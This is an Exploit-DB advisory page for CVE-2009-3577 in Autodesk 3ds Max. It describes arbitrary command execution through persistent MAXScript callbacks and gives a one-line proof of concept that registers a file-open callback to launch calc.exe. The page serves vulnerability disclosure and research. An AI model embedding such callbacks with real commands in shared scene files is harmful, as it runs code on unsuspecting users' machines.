Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution

EDB-ID:

33272

CVE:

2009-3577

EDB Verified:

Author:

Sebastian Tello

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2009-10-23

Vulnerable App: 
source: https://www.securityfocus.com/bid/36634/info

Autodesk 3ds Max is prone to a vulnerability that lets attackers execute arbitrary commands in the context of the vulnerable application.

This issue affects the following:

3ds Max 6 through 9
3ds Max 2008 through 2010

Other versions may also be vulnerable. 

The following proof-of-concept code is available:

callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")") id:#mbLoadCallback persistent:true
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services